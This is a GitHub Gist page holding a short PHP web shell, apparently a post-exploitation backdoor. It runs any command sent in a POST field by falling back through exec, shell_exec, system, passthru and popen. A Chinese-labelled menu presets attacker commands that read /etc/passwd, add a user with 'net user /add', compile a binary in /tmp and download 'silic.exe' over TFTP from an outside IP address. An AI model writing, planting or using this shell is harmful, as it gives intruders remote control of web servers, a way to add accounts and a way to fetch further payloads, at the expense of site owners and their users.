Created
April 1, 2022 14:01
-
-
Save xiaozhu2007/f0b8f24b64376db98d8eea194865dcd6 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| error_reporting(E_ERROR); | |
| header("content-Type: text/html; charset=utf-8"); | |
| set_time_limit(0); | |
| function Root_CSS() | |
| { | |
| print<<<CSS | |
| <style type="text/css"> | |
| * { | |
| padding: 0; | |
| margin: 0; | |
| } | |
| body { | |
| background: #fff; | |
| font-family: "Verdana","Tahoma","宋体",sans-serif; | |
| font-size: 13px; | |
| margin-top: 3px; | |
| margin-bottom: 3px; | |
| table-layout: fixed; | |
| word-break: break-all; | |
| } | |
| </style>\n | |
| CSS; | |
| return false; | |
| } | |
| //执行命令 | |
| function Exec_Run($cmd) | |
| { | |
| $res = ''; | |
| if(function_exists('exec')){@exec($cmd,$res);$res = join("\n",$res);} | |
| elseif(function_exists('shell_exec')){$res = @shell_exec($cmd);} | |
| elseif(function_exists('system')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();} | |
| elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();} | |
| elseif(@is_resource($f = @popen($cmd,"r"))){$res = '';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);} | |
| return $res; | |
| } | |
| function Exec_g() | |
| { | |
| $res = '回显'; | |
| $cmd = 'dir'; | |
| if(!empty($_POST['cmd'])){$res = Exec_Run($_POST['cmd']);$cmd = $_POST['cmd'];} | |
| print<<<EROOT | |
| <script language="javascript"> | |
| function sFull(i){ | |
| Str = new Array(14); | |
| Str[0] = "dir"; | |
| Str[1] = "ls /etc"; | |
| Str[2] = "cat /etc/passwd"; | |
| Str[3] = "copy"; | |
| Str[4] = "uname -a"; | |
| Str[5] = "gcc -o /tmp/silic /tmp/silic.c"; | |
| Str[6] = "net user /add"; | |
| Str[7] = "net user"; | |
| Str[8] = "netstat -an"; | |
| Str[9] = "ipconfig"; | |
| Str[10] = "copy c:\\1.php d:\\2.php"; | |
| Str[11] = "tftp -i 123.234.222.1 get silic.exe c:\\silic.exe"; | |
| Str[12] = "lsb_release -a"; | |
| Str[13] = "chmod 777 /tmp/silic.c"; | |
| document.getElementById('cmd').value = Str[i]; | |
| return true; | |
| } | |
| </script> | |
| <form method="POST" name="gform" id="gform" action="?#"><center><div class="actall"> | |
| 命令参数 <input type="text" name="cmd" id="cmd" value="{$cmd}" style="width:399px;"> | |
| <select onchange='return sFull(options[selectedIndex].value)'> | |
| <option value="0" selected>--命令集合--</option> | |
| <option value="1">文件列表</option> | |
| <option value="2">读取配置</option> | |
| <option value="3">拷贝文件</option> | |
| <option value="4">系统信息</option> | |
| <option value="5">编译文件</option> | |
| <option value="6">添加管理</option> | |
| <option value="7">用户列表</option> | |
| <option value="8">查看端口</option> | |
| <option value="9">查看地址</option> | |
| <option value="10">复制文件</option> | |
| <option value="11">FTP下载</option> | |
| <option value="12">内核版本</option> | |
| <option value="13">更改属性</option> | |
| </select> | |
| <input type="submit" value="执行" style="width:80px;"></div> | |
| <div class="actall"><textarea name="show" style="width:660px;height:399px;">{$res}</textarea></div></center></form> | |
| EROOT; | |
| return true; | |
| } | |
| /////////////////////////////////////////////////////////////////////////////////////////////////// | |
| /////////////////////////////////////////////////////////////////////////////////////////////////// | |
| @Root_CSS(); | |
| @Exec_g(); | |
| ?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment